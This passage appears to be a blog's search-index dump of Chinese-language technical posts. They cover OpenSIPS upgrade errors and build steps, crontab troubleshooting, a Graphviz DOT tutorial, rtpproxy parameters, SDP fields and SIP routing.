/usr/local/lib64/opensips/modules/dialplan.so: undefined symbol: debug Jul 18 19:37:23 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 161, column 13-14: failed to load module dialplan.so Jul 18 19:37:23 [28181] ERROR:core:set_mod_param_regex: no module matching dialplan found Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 162, column 20-21: Parameter \u0026lt;db_url\u0026gt; not found in module \u0026lt;dialplan\u0026gt; - can\u0026#39;t set Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: bare word \u0026lt;uri\u0026gt; found, command calls need \u0026#39;()\u0026#39; Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file 
/usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 35-36: bare word \u0026lt;myself\u0026gt; found, command calls need \u0026#39;()\u0026#39; Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 35-36: bad command: missing \u0026#39;;\u0026#39;? Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 37-39: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: bad command: missing \u0026#39;;\u0026#39;? Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 54-55: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 255, column 2-4: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 255, column 2-4: Jul 18 19:37:23 [28181] ERROR:core:main: bad config file (26 errors) Jul 18 19:37:23 [28181] NOTICE:core:main: Exiting.... 
","permalink":"https://wdd.js.org/opensips/ch3/centos7-2.4/","summary":"环境声明 系统 centos7 已经安装opensips 2.2 需要升级目标 opensips 2.4.6 要求:当前系统上没有部署mysql服务端程序 升级步骤 升级分为两步\nopensips 应用升级,包括源码的下载,编译等等 opensips 数据库升级,使用opensipsdbctl工具迁移老的数据 Edge: opensips应用升级 升级过程以Makefile交付,可以先新建一个空的目录,如 /root/opensips-update/\n# file: /root/opensips-update/Makefile VERSION=2.4.6 download: wget https://opensips.org/pub/opensips/$(VERSION)/opensips-$(VERSION).tar.gz; tar -zxvf opensips-$(VERSION).tar.gz; build: cd opensips-$(VERSION); make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 make install include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 新建空目录/root/opensips-update/ 在新目录中创建名为 Makefile的文件, 内容如上面所示 执行 make download 执行 make build Core: opensips应用升级 make all -j4 include_modules=\u0026#34;db_mysql httpd\u0026#34; make install include_modules=\u0026#34;db_mysql httpd\u0026#34; 可能遇到的报错以及解决方案 主要的问题可能是某些包冲突,或者某些库没有安装依赖。在解决问题后,需要重新编译。","title":"opensips centos7 安装与升级"},{"content":"我已经在 crontab 上栽了很多次跟头了,我决定写个总结。\n常用的命令 crontab -l # 显示计划任务脚本 crontab -e # 编辑计划任务 计划任务的格式 时间格式 * # 每个最小单元 / # 时间步长,每隔多长时间执行 */10 - # 区间,如 4-9 , # 散列,如 4,9,10 几个例子 crontab 最小支持的时间单位是 1 分钟,不支持每隔多少秒执行一次\n# 每分钟执行 * * * * * cmd # 每小时的15,45分钟执行 15,45 * * * * cmd # 每周一到周五,早上9点到下午6点之间,每隔15分钟喝一次水 */15 9-18 * * 1-5 喝水 每隔 X 秒执行 crontab 的默认最小执行周期是 1 分钟,如果想每隔多少秒执行一次,就需要一些特殊的手段。\n每隔 5 秒 * * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔 15 秒 * * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 为什么 crontab 指定的脚本没有执行? 
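排查之前,可以先脱离 cron 验证一遍脚本本身。下面是一个可独立运行的小演示(临时目录和命令名 mytool 都是假设的示例,并非真实环境),模拟 cron 的精简 PATH 导致命令找不到,以及像正文那样在脚本里显式补全 PATH 的修法:

```shell
#!/bin/sh
# 演示:cron 的 PATH 通常只有 /usr/bin:/bin,
# 放在 /usr/local/sbin 等目录下的命令会找不到。
# 这里用临时目录和示例命令 mytool 模拟。
tmp=$(mktemp -d)
printf '#!/bin/sh\necho hello-from-mytool\n' > "$tmp/mytool"
chmod +x "$tmp/mytool"

PATH=/usr/bin:/bin              # 模拟 cron 的精简 PATH
command -v mytool >/dev/null 2>&1 || echo "mytool: not found"

PATH="$tmp:$PATH"               # 像正文那样在脚本里显式补全 PATH
mytool                          # 此时可以正常执行
rm -rf "$tmp"
```

如果脚本这样跑没问题,再去排查 cron 本身的权限和日志。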
有以下可能原因\n没有权限执行某个命令 某个命令不在环境变量中,无法找到对应命令 首先你必须测试一下,你的脚本不使用 crontab 能否正常执行。\n大部分 crontab 执行不成功,都是因为环境变量的问题。\n下面写个例子:\n#!/bin/bash now=`date` msg=`opensips -V` echo \u0026#34;$now $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log cd /root sh test.sh crontab -e 将 test.sh 加入 crontab 中\n* * * * * sh /root/test.sh centos crontab 的执行日志在/var/log/cron 中,可以查看执行日志。\n我的机器是树莓派,没有这个文件,但是我是把执行输出到/root/test.log 中的,可以查看这个文件\n可以看到虽然输出了时间,但是并没有输出 opensips 的版本\nMon 1 Jul 13:04:01 BST 2019 Mon 1 Jul 13:05:01 BST 2019 将$PATH 也加入输出,发现Mon 1 Jul 13:10:01 BST 2019 /usr/bin:/bin,而 opensips 这个命令是位于/usr/local/sbin 下,所以无法找到执行文件,当然无法执行\n#!/bin/bash now=`date` msg=`opensips -V` echo \u0026#34;$now $PATH $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log 那还不好办吗?\n在当前工作目录执行 echo $PATH, 然后在脚本里设置一个环境变量就能搞定\n#!/bin/bash PATH=\u0026#39;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\u0026#39; now=`date` msg=`opensips -V` echo \u0026#34;$now $PATH $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log 也可以使用 journalctl -t CROND 查看 crond 的日志\n检查 crontab 是否运行 systemctl status crond systemctl restart crond 在 alpine 中执行 crontab alpine 中没有 systemctl, 需要启动 crond 的守护进程,否则定时任务是不会执行的\n#!/bin/sh # start cron /usr/sbin/crond -f -l 8 ","permalink":"https://wdd.js.org/shell/crontab-tips/","summary":"我已经在 crontab 上栽了很多次跟头了,我决定写个总结。\n常用的命令 crontab -l # 显示计划任务脚本 crontab -e # 编辑计划任务 计划任务的格式 时间格式 * # 每个最小单元 / # 时间步长,每隔多长时间执行 */10 - # 区间,如 4-9 , # 散列,如 4,9,10 几个例子 crontab 最小支持的时间单位是 1 分钟,不支持每隔多少秒执行一次\n# 每分钟执行 * * * * * cmd # 每小时的15,45分钟执行 15,45 * * * * cmd # 每周一到周五,早上9点到下午6点之间,每隔15分钟喝一次水 */15 9-18 * * 1-5 喝水 每隔 X 秒执行 crontab 的默认最小执行周期是 1 分钟,如果想每隔多少秒执行一次,就需要一些特殊的手段。\n每隔 5 秒 * * * * * for i in {1.","title":"长太息以掩涕兮,哀crontab之难用"},{"content":"语雀官方的Graphviz感觉太复杂,我还是写一个简单一点的吧。\n两个圆一条线 注意\ngraph是用来标记无向图,里面只能用\u0026ndash;,不能用-\u0026gt;,否则无法显示出图片 digraph用来标记有向图,里面只能用-\u0026gt;, 不能用\u0026ndash;, 否则无法显示出图片 graph easy { a -- b; } 连线加个备注 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;] } 你真漂亮,要大点,红色显眼点 
graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;, fontcolor=red, fontsize=34] } 两个圆,一个带有箭头的线 注意,这里用的digraph, 用来表示有向图\ndigraph easy { a -\u0026gt; b; } 如何画虚线呢? digraph easy { a -\u0026gt; b [style=dashed]; } 椭圆太单调了,有没有其他形状? shape\nbox 矩形 polygon ellipse circle 圆形 point egg 蛋形 triangle 三角形 plaintext 使用文字 diamond 钻石型 trapezium 梯形 parallelogram 斜的长方形 house hexagon octagon doublecircle doubleoctagon tripleoctagon invtriangle invtrapezium invhouse Mdiamond Msquare Mcircle none record Mrecord graph easy { node [shape=box] a -- b; } 形状也可以直接给节点定义。\ngraph easy{ a [shape=parallelogram] b [shape=egg] a--b; } 还有什么布局姿势? 默认图是从上到下画的,你可以用rankdir = LR来让图从左往右绘制\ndigraph easy { rankdir = LR; a -\u0026gt; b; } 当然,还有其他姿势\nrankdir\nLR 从左往右布局 RL 从右往左布局 TB 从上往下布局(默认) BT 从下往上布局 多来几个圆,看看效果 digraph easy { rankdir = LR; a -\u0026gt; b; b -\u0026gt; c; a -\u0026gt; c; c -\u0026gt; d; a -\u0026gt; d; } 怎么加注释? 支持两种注释\n// /**/ digraph easy { a -\u0026gt; b; // 从a到b b -\u0026gt; c; /* 从b到c */ } 句尾要不要加分号? 答:分号不是必须的,你随意\n如何起个别名? 
不起别名的时候,名字太长,引用不方便。\ngraph easy{ \u0026#34;直到确定,手的温度来自你心里\u0026#34;--\u0026#34;这一刻,也终于勇敢说爱你\u0026#34;; \u0026#34;这一刻,也终于勇敢说爱你\u0026#34; -- \u0026#34;一开始 我只顾着看你, 装做不经意 心却飘过去\u0026#34; } 起个别名,快速引用\ngraph easy{ a [label=\u0026#34;直到确定,手的温度来自你心里\u0026#34;]; b [label=\u0026#34;这一刻,也终于勇敢说爱你\u0026#34;]; c [label=\u0026#34;一开始 我只顾着看你, 装做不经意 心却飘过去\u0026#34;] a -- b; b -- c; } 统一设置点线的样式 digraph easy{ rankdir = LR; node [color=Red,shape=egg] edge [color=Pink, style=dashed] a -\u0026gt; b; b -\u0026gt; c; a -\u0026gt; c; c -\u0026gt; d; a -\u0026gt; d; } 加点颜色 digraph easy{ bgcolor=Pink; b [style=filled, fillcolor=yellow, center=true] a-\u0026gt;b; } 禁用关键词 下面的关键词,不区分大小写,不能作为节点的名字,如果你用了,你的图就画不出来\nnode, edge, graph, digraph, subgraph, and strict\n下面的写法会导致绘图失败\ngraph a { node -- edge } 但是关键词可以作为Label\ngraph a { a [label=\u0026#34;node\u0026#34;] b [label=\u0026#34;edge\u0026#34;] a -- b } 快捷方式 - 串起来 # 方式1 两点之间一个一个连接 digraph { a -\u0026gt; b; b -\u0026gt; c; c -\u0026gt; d; } # 方式2 直接串起来所有的点 digraph { a -\u0026gt; b -\u0026gt; c -\u0026gt; d; } # 方式3 直接串起来所有的点, 也可换行 digraph { a-\u0026gt;b -\u0026gt;c -\u0026gt;d -\u0026gt;e; } 对比发现,直接串起来的话,更简单,速度更快。对于无向图 也可以用 a -- b -- c -- d 的方式串起来。\n快捷方式 - 大括号 对于上面的图,也有两种绘制方法。用大括号的方式明显更好呀! 😺\n# 方式1 digraph { a -\u0026gt; b; a -\u0026gt; c; a -\u0026gt; d; b -\u0026gt; z; c -\u0026gt; z; d -\u0026gt; z; } # 方式2 digraph { a -\u0026gt; {b;c;d} {b;c;d} -\u0026gt; z } 数据结构 UML 怎么画呀? 比如说下面的typescript数据结构\ninterface Man { name: string; age: number; isAdmin: boolean } interface Phone { id: number; type: string; } 注意:node [shape=\u0026#34;record\u0026#34;]\ndigraph { node [shape=\u0026#34;record\u0026#34;] man[label=\u0026#34;{Man|name:string|age:number|isAdmin:boolean}\u0026#34;] phone[label=\u0026#34;{Phone|id:number|type:string}\u0026#34;] } 数据结构之间的关系如何表示? 
锚点 例如Man类型有个字段phone, 是Phone类型的\ninterface Man { name: string; age: number; isAdmin: boolean; phone: Phone } interface Phone { id: number; type: string; } interface Plain { key1:aaa; key2:bbb; } 注意lable里面的内容,其中\u0026lt;\u0026gt;这个符号可以理解为一个锚点。\nman:age-\u0026gt;plain:key1 这个意思是man的age锚点连接到plain的key1锚点。\ndigraph { node [shape=\u0026#34;record\u0026#34;] man[label=\u0026#34;{Man|name:string|\u0026lt;age\u0026gt;age:number|isAdmin:boolean|\u0026lt;phone\u0026gt;phone:Phone}\u0026#34;] phone[label=\u0026#34;{Phone|id:number|\u0026lt;type\u0026gt;type:string}\u0026#34;] plain[label=\u0026#34;{Plain|\u0026lt;key1\u0026gt;key1:aaa|key2:bbb}\u0026#34;] man:phone-\u0026gt;phone man:age-\u0026gt;plain:key1 [color=\u0026#34;red\u0026#34;] phone:type-\u0026gt;plain:key1 } hash 链表 digraph { rankdir=LR; node [shape=\u0026#34;record\u0026#34;,height=.1, width=.1]; node0 [label = \u0026#34;\u0026lt;f0\u0026gt;a |\u0026lt;f1\u0026gt;b |\u0026lt;f2\u0026gt;c|\u0026#34;, height=2.5]; node1 [label = \u0026#34;{\u0026lt;n\u0026gt; a1 | a2 | a3 | a4 |\u0026lt;p\u0026gt; }\u0026#34;]; node2 [label = \u0026#34;{\u0026lt;n\u0026gt; b1 | b2 |\u0026lt;p\u0026gt; }\u0026#34;]; node3 [label = \u0026#34;{\u0026lt;n\u0026gt; c1 | c2 |\u0026lt;p\u0026gt; }\u0026#34;]; node0:f0-\u0026gt;node1:n [headlabel=\u0026#34;a link\u0026#34;] node0:f1-\u0026gt;node2:n [headlabel=\u0026#34;b link\u0026#34;] node0:f2-\u0026gt;node3:n [headlabel=\u0026#34;c link\u0026#34;] } label {}的作用 digraph { node [shape=\u0026#34;record\u0026#34;]; node0 [label = \u0026#34;0|a|b|c|d|e\u0026#34;,height=2.5]; node1 [label = \u0026#34;{1|a|b|c|d|e}\u0026#34;,height=2.5]; } 对于record而言\n有{} , 则属性作用于整体 无{}, 则属性作用于个体 分组子图 subgraph 关键词标记分组 组名必需以cluster开头 graph { rankdir=LR node [shape=\u0026#34;box\u0026#34;] subgraph cluster_1 { label=\u0026#34;network1\u0026#34;; bgcolor=\u0026#34;mintcream\u0026#34;; host_11 [label=\u0026#34;router\u0026#34;]; host_12; host_13; } subgraph cluster_2 { label=\u0026#34;network2\u0026#34;; 
bgcolor=\u0026#34;mintcream\u0026#34;; host_21 [label=\u0026#34;router\u0026#34;]; host_22; host_23; } host_12--host_11; host_13--host_11; host_11--host_21; host_22--host_21; host_23--host_21; } 流程图 二等车厢座位示意图 digraph{ label=\u0026#34;二等车厢座位示意图\u0026#34; node [shape=record]; struct3 [ shape=record, label=\u0026#34;车窗|{ {01A|01B|01C}| {02A|02B|02C}| {03A|03B|03C} } |过道|{ {01D|01F}| {02D|02F}| {03D|03F} }|车窗\u0026#34; ]; } Node Port 可以使用nodePort来调整目标的连接点, node Port可以理解为地图上的东南西北。\nn | w\u0026lt;----+----\u0026gt; e | s digraph { rankdir=LR node [shape=box] a-\u0026gt;b:n [label=n] a-\u0026gt;b:ne [label=ne] a-\u0026gt;b:e [label=e] a-\u0026gt;b:se [label=se] a-\u0026gt;b:s [label=s] a-\u0026gt;b:sw [label=sw] a-\u0026gt;b:w [label=w] a-\u0026gt;b:nw [label=nw] } 电磁感应线圈 \u0026lt;\u0026gt;可以用来自定义锚点,锚点可以用来连线。\ndigraph{ node [shape=record]; edge[style=dashed] t [style=filled;fillcolor=gray;label=\u0026#34;\u0026lt;l\u0026gt;N| |||||||\u0026lt;r\u0026gt;S\u0026#34;] t:l-\u0026gt;t:r [color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] } 三体纠缠 digraph{ nodesep=.8 ranksep=1 rankdir=TD node[shape=circle] edge [style=dashed] a[style=filled;fillcolor=red;label=\u0026#34;\u0026#34;;color=red] b[style=filled;fillcolor=red2;label=\u0026#34;\u0026#34;;color=red2] c[style=filled;fillcolor=red4;label=\u0026#34;\u0026#34;;color=red4] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] 
c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] } 二叉树 digraph { node [shape = record,height=.1]; t0 [label=\u0026#34;\u0026lt;l\u0026gt;|9|\u0026lt;r\u0026gt;\u0026#34;] t1 [label=\u0026#34;\u0026lt;l\u0026gt;|1|\u0026lt;r\u0026gt;\u0026#34;] t5 [label=\u0026#34;\u0026lt;l\u0026gt;|5|\u0026lt;r\u0026gt;\u0026#34;] t6 [label=\u0026#34;\u0026lt;l\u0026gt;|6|\u0026lt;r\u0026gt;\u0026#34;] t11 [label=\u0026#34;\u0026lt;l\u0026gt;|11|\u0026lt;r\u0026gt;\u0026#34;] t34 [label=\u0026#34;\u0026lt;l\u0026gt;|34|\u0026lt;r\u0026gt;\u0026#34;] t0:l-\u0026gt;t5 t0:r-\u0026gt;t11 t5:l-\u0026gt;t1 t5:r-\u0026gt;t6 t11:r-\u0026gt;t34 } 水平分层 相关的节点,可以使用rank属性,使其分布在相同的水平层次。\ndigraph{ nodesep=.3 ranksep=.8 node [shape=none] 应用层 -\u0026gt; 运输层 -\u0026gt; 网络层 -\u0026gt; 链路层; node [shape=box]; http;websocket;sip;ssh; tcp;udp; icmp;ip;igmp; arp;rarp; {rank=same;应用层;http;websocket;sip;ssh} {rank=same;运输层;tcp;udp} {rank=same;网络层;icmp;ip;igmp} {rank=same;链路层;arp;硬件接口;rarp} http-\u0026gt;tcp websocket-\u0026gt;tcp; sip-\u0026gt;tcp; sip-\u0026gt;udp; ssh-\u0026gt;tcp; tcp-\u0026gt;ip; udp-\u0026gt;ip; ip-\u0026gt;igmp; icmp-\u0026gt;ip; ip-\u0026gt;硬件接口; arp-\u0026gt;硬件接口; 硬件接口-\u0026gt;rarp; } 最后挑战,画个小人 digraph easy{ nodesep = 0.5 header [shape=circle, label=\u0026#34;^_^\u0026#34;, style=filled, fillcolor=pink] body [shape=invhouse, label=\u0026#34;~ ~\\n~ ~\\n~ ~\u0026#34;, center=true, style=filled, fillcolor=peru] leftHand [shape=Mcircle, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] rightHand [shape=Mcircle, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] leftFoot [shape=egg, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] rightFoot [shape=egg, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] header-\u0026gt;body [arrowhead=crow]; body-\u0026gt;leftHand [arrowhead=invodot, penwidth=3, color=cornflowerblue, tailport=ne]; body-\u0026gt; rightHand [arrowhead=invodot, penwidth=3, color=cornflowerblue, 
tailport=nw]; body -\u0026gt; leftFoot [arrowhead=tee, penwidth=5, color=cornflowerblue] body -\u0026gt; rightFoot [arrowhead=tee, penwidth=5, color=cornflowerblue] } 还有哪些颜色可以使用呢? 颜色预览:http://www.graphviz.org/doc/info/colors.html\n还有哪些箭头的样式可以用呢? 我的图没预览出来,怎么办? 一般来说,如果图没有渲染出来,都是因为绘图语法出问题了。\n我刚刚开始用的时候,就常常把\u0026ndash;用在有向图中,导致图无法预览。建议官方可以把报错信息提示给用户。\n目前来说,这个错误信息只在控制台中打印了,需要按F12打开浏览器的console界面。看看哪里出错了,然后找到对应的位置修改。\n参考 https://graphviz.gitlab.io/_pages/pdf/dotguide.pdf https://casatwy.com/shi-yong-dotyu-yan-he-graphvizhui-tu-fan-yi.html 附件 dotguide.pdf\n","permalink":"https://wdd.js.org/posts/2019/06/","summary":"语雀官方的Graphviz感觉太复杂,我还是写一个简单一点的吧。\n两个圆一条线 注意\ngraph是用来标记无向图,里面只能用\u0026ndash;,不能用-\u0026gt;,否则无法显示出图片 digraph用来标记有向图,里面只能用-\u0026gt;, 不能用\u0026ndash;, 否则无法显示出图片 graph easy { a -- b; } 连线加个备注 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;] } 你真漂亮,要大点,红色显眼点 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;, fontcolor=red, fontsize=34] } 两个圆,一个带有箭头的线 注意,这里用的digraph, 用来表示有向图\ndigraph easy { a -\u0026gt; b; } 如何画虚线呢? digraph easy { a -\u0026gt; b [style=dashed]; } 椭圆太单调了,有没有其他形状? shape\nbox 矩形 polygon ellipse circle 圆形 point egg 蛋形 triangle 三角形 plaintext 使用文字 diamond 钻石型 trapezium 梯形 parallelogram 斜的长方形 house hexagon octagon doublecircle doubleoctagon tripleoctagon invtriangle invtrapezium invhouse Mdiamond Msquare Mcircle none record Mrecord graph easy { node [shape=box] a -- b; } 形状也可以直接给节点定义。","title":"Graphviz教程 你学废了吗?"},{"content":"rtpproxy能提供什么功能? VoIP NAT穿透 传输声音、视频等任何RTP流 播放预先设置的呼入放音 RTP包重新分片 包传输优化 VoIP VPN 穿透 实时流复制 rtpproxy一般和哪些软件集成? 
opensips Kamailio Sippy B2BUA freeswitch reSIProcate B2BUA rtpporxy的工作原理 启动参数介绍 参数 功能说明 例子 -l ipv4监听的地址 -l 192.168.3.47 -6 ipv6监听的地址 -s 控制Socket, 通过这个socket来修改,创建或者删除rtp session -s udp:192.168.3.49:6890 -F 默认情况下,rtpproxy会警告用户以超级用户的身份运行rtpproxy并且不允许远程控制。使用-F可以关闭这个限制 -m 最小使用的端口号,默认35000 -m 20000 -M 最大使用的端口号,默认65000 -M 50000 -L 单个进程最多可以使用的文件描述符。rtpproxy要求每个session使用4个文件描述符。 -L 20000 -d 日志级别,可选DBUG, INFO, WARN, ERR and CRIT, 默认DBUG -d ERR -A 广播地址,用于rtpprxy在NAT防火墙内部时使用 -A 171.16.200.13 -f 让rtpproxy前台运行,在做rtpproxy容器化时,启动脚本必须带有-f,否则容器运行后会立即退出 -V 输出rtpproxy的版本 参考 https://www.rtpproxy.org/ https://www.rtpproxy.org/doc/master/user_manual.html https://github.com/sippy/rtpproxy ","permalink":"https://wdd.js.org/opensips/ch9/rtpproxy/","summary":"rtppoxy能提供什么功能? VoIP NAT穿透 传输声音、视频等任何RTP流 播放预先设置的呼入放音 RTP包重新分片 包传输优化 VoIP VPN 穿透 实时流复制 rtpproxy一般和那些软件集成? opensips Kamailio Sippy B2BUA freeswitch reSIProcate B2BUA rtpporxy的工作原理 启动参数介绍 参数 功能说明 例子 -l ipv4监听的地址 -l 192.168.3.47 -6 ipv6监听的地址 -s 控制Socket, 通过这个socket来修改,创建或者删除rtp session -s udp:192.168.3.49:6890 -F 默认情况下,rtpproxy会警告用户以超级用户的身份运行rtpproxy并且不允许远程控制。使用-F可以关闭这个限制 -m 最小使用的端口号,默认35000 -m 20000 -M 最大使用的端口号,默认65000 -M 50000 -L 单个进程最多可以使用的文件描述符。rtpproxy要求每个session使用4个文件描述符。 -L 20000 -d 日志级别,可选DBUG, INFO, WARN, ERR and CRIT, 默认DBUG -d ERR -A 广播地址,用于rtpprxy在NAT防火墙内部时使用 -A 171.16.200.13 -f 让rtpproxy前台运行,在做rtpproxy容器化时,启动脚本必须带有-f,否则容器运行后会立即退出 -V 输出rtpproxy的版本 参考 https://www.rtpproxy.org/ https://www.","title":"rtpproxy学习"},{"content":"sdp栗子 v=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Session描述 **\nv= (protocol version number, currently only 0) o= (originator and session identifier : username, id, version number, network address) s= (session name : mandatory with at least one UTF-8-encoded character) i=* (session title or short information) u=* (URI of 
description) e=* (zero or more email address with optional name of contacts) p=* (zero or more phone number with optional name of contacts) c=* (connection information—not required if included in all media) b=* (zero or more bandwidth information lines) One or more Time descriptions (\u0026#34;t=\u0026#34; and \u0026#34;r=\u0026#34; lines; see below) z=* (time zone adjustments) k=* (encryption key) a=* (zero or more session attribute lines) Zero or more Media descriptions (each one starting by an \u0026#34;m=\u0026#34; line; see below) 时间描述(必须) t= (time the session is active) r=* (zero or more repeat times) 媒体描述(可选) m= (media name and transport address) i=* (media title or information field) c=* (connection information — optional if included at session level) b=* (zero or more bandwidth information lines) k=* (encryption key) a=* (zero or more media attribute lines — overriding the Session attribute lines) ","permalink":"https://wdd.js.org/opensips/ch9/sdp/","summary":"sdp栗子 v=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Session描述 **\nv= (protocol version number, currently only 0) o= (originator and session identifier : username, id, version number, network address) s= (session name : mandatory with at least one UTF-8-encoded character) i=* (session title or short information) u=* (URI of description) e=* (zero or more email address with optional name of contacts) p=* (zero or more phone number with optional name of contacts) c=* (connection information—not required if included in all media) b=* (zero or more bandwidth information lines) One or more Time descriptions (\u0026#34;t=\u0026#34; and \u0026#34;r=\u0026#34; lines; see below) z=* (time zone adjustments) k=* (encryption key) a=* (zero or more session attribute lines) Zero or more Media descriptions (each one starting by an 
\u0026#34;m=\u0026#34; line; see below) 时间描述(必须) t= (time the session is active) r=* (zero or more repeat times) 媒体描述(可选) m= (media name and transport address) i=* (media title or information field) c=* (connection information — optional if included at session level) b=* (zero or more bandwidth information lines) k=* (encryption key) a=* (zero or more media attribute lines — overriding the Session attribute lines) ","title":"sdp协议简介"},{"content":" Building Telephony Systems with OpenSIPS Second Edition SIP: Session Initiation Protocol Session Initiation Protocol (SIP) Basic Call Flow Examples Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) SDP: Session Description Protocol freeswitch权威指南 SIP: Understanding the Session Initiation Protocol, Third Edition (Artech House Telecommunications) https://tools.ietf.org/html/rfc4028 Hacking VoIP: Protocols, Attacks, and Countermeasures ","permalink":"https://wdd.js.org/opensips/ch9/books/","summary":" Building Telephony Systems with OpenSIPS Second Edition SIP: Session Initiation Protocol Session Initiation Protocol (SIP) Basic Call Flow Examples Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) SDP: Session Description Protocol freeswitch权威指南 SIP: Understanding the Session Initiation Protocol, Third Edition (Artech House Telecommunications) https://tools.ietf.org/html/rfc4028 Hacking VoIP: Protocols, Attacks, and Countermeasures ","title":"参考资料与书籍"},{"content":" 操作 无状态 有状态 SIP forward forward() t_relay() SIP replying sl_send_reply() t_reply() Create transaction t_newtran() Match transcation t_check_trans() ","permalink":"https://wdd.js.org/opensips/ch5/stateful-stateless/","summary":" 操作 无状态 有状态 SIP forward forward() t_relay() SIP replying sl_send_reply() t_reply() Create transaction t_newtran() Match transcation t_check_trans() ","title":"有状态和无状态路由"},{"content":"松散路由是sip 2版本的新的路由方法。严格路由是老的路由方法。\n如何从sip消息中区分严格路由和松散路由 下图sip消息中Route字段中带有**lr, 
**则说明这是松散路由。\nREGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:58979;rport;branch=z9hG4bKPjMRzNdeTKn9rHNDtyJuVoyrDb84.cPtL8 Route: \u0026lt;sip:127.0.0.1;lr\u0026gt; Max-Forwards: 70 From: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt;;tag=oqkOzbQYd9cx5vXFjUnB1WufgWUZZxtZ To: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt; 功能上的区别 严格路由,sip请求经过uas后,invite url每次都会被重写。\n松散路由,sip请求经过uas后,invite url不变。\n#1 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com #2 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #3 invite INVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #4 200 ok SIP/2.0 200 OK Contact: sip:callee@u2.domain.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; 